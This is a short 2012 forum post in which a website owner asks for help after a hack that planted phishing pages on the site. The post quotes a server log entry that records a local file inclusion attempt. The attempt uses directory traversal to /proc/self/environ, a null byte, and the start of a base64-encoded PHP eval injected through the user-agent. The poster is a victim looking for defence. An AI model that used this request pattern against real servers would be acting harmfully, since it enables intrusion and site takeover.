January 9, 2012

My site has been used for Phishing

Help please,

I have a website that someone has been able to hack and install phishing pages!

I need to set the security to make this impossible. Looking back in the logs I found this code snippet:

"GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('

After the page=latestnews there is a reference to conlib/prepend?cfg[path][contendido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.

I have several sites on a dedicated FastHosts server but only 1 is being attacked?

Has anyone come across this and can recommend what to do?